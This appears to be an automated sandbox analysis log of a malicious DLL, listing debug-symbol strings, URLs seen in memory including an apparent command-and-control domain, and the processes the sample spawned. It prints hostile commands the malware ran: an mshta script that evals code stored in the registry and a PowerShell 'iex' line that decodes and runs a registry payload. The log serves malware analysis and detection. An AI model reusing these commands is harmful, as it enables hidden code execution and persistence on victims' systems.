Source: |
Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: bcrypt.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: sfc_os.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: fltLib.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: rundll32.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wsspicli.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: shell32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wsspicli.pdb5 source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: propsys.pdb- source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: mpr.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: cryptbase.pdb; source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: Bed.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: setupapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: imagehlp.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000002.436609525.0000000004DF9000.00000004.00000001.sdmp |
Source: |
Binary string: winspool.pdb! source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: shcore.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: profapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: winspool.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: iphlpapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: propsys.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdb source: rundll32.exe, 00000002.00000002.444299096.000000006E191000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.616072901.000000006E191000.00000002.00020000.sdmp, WerFault.exe, 00000014.00000003.411602089.0000000004DE1000.00000004.00000001.sdmp, lj3H69Z3Io.dll |
Source: |
Binary string: powrprof.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: netapi32.pdbD source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: AcLayers.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: cryptbase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: netapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: cfgmgr32.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: Windows.Storage.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: rundll32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wtsapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: iphlpapi.pdb' source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: sfc_os.pdbS source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: sfc.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wntdll.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdbbj source: WerFault.exe, 00000014.00000003.412073889.0000000004DB5000.00000004.00000001.sdmp |
Source: |
Binary string: netutils.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: Nc:\201\Their\Quart-Sheet\497_who\Bed.pdb source: WerFault.exe, 00000014.00000003.411494273.0000000004E04000.00000004.00000001.sdmp |
Source: powershell.exe, 0000002A.00000002.626923996.00000273E0C30000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: {08A52032-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr, ~DFBCEA36BA3DC5EC74.TMP.32.dr |
String found in binary or memory: http://gtr.antoinfer.com/4khtvsQ0u/_2Bibxls4V27IXxwFbLo/MVAeZiN_2BcOXrnrV8V/qJdJNxZ6Bgv5NEeycuU5RT/x |
Source: rundll32.exe, 00000003.00000002.610195146.0000000002CD0000.00000002.00000001.sdmp, powershell.exe, 0000002A.00000002.609722055.00000273C7180000.00000002.00000001.sdmp |
String found in binary or memory: http://gtr.antoinfer.com/M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2 |
Source: {08A52036-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr |
String found in binary or memory: http://gtr.antoinfer.com/M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2FaVCd |
Source: {08A52034-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr, ~DF5A692A62F2D75F35.TMP.32.dr |
String found in binary or memory: http://gtr.antoinfer.com/Pl9Eori10/TWROVDxUXG0e5P8cvyge/ZU2BrrTT9UbiVqqjDG4/pcVLHkjQ_2FTIEKMeI9p0c/u |
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 0000002A.00000002.610882160.00000273C88F1000.00000004.00000001.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll' |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Dealthis |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Sing |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Teethshould |
|
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 648 |
|
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 656 |
|
Source: unknown |
Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding |
|
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17410 /prefetch:2 |
|
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:82950 /prefetch:2 |
|
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17430 /prefetch:2 |
|
Source: unknown |
Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' |
|
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Dealthis |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Sing |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Teethshould |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 |
Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17410 /prefetch:2 |
Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:82950 /prefetch:2 |
Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17430 /prefetch:2 |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) |
Jump to behavior |
Source: |
Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: bcrypt.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: sfc_os.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: fltLib.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: rundll32.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wsspicli.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: shell32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wsspicli.pdb5 source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: propsys.pdb- source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: mpr.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: cryptbase.pdb; source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: Bed.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: setupapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: imagehlp.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000002.436609525.0000000004DF9000.00000004.00000001.sdmp |
Source: |
Binary string: winspool.pdb! source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: shcore.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: profapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: winspool.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: iphlpapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: propsys.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdb source: rundll32.exe, 00000002.00000002.444299096.000000006E191000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.616072901.000000006E191000.00000002.00020000.sdmp, WerFault.exe, 00000014.00000003.411602089.0000000004DE1000.00000004.00000001.sdmp, lj3H69Z3Io.dll |
Source: |
Binary string: powrprof.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: netapi32.pdbD source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: AcLayers.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: cryptbase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: netapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: cfgmgr32.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: Windows.Storage.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: rundll32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wtsapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: iphlpapi.pdb' source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: sfc_os.pdbS source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: sfc.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wntdll.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdbbj source: WerFault.exe, 00000014.00000003.412073889.0000000004DB5000.00000004.00000001.sdmp |
Source: |
Binary string: netutils.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: Nc:\201\Their\Quart-Sheet\497_who\Bed.pdb source: WerFault.exe, 00000014.00000003.411494273.0000000004E04000.00000004.00000001.sdmp |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
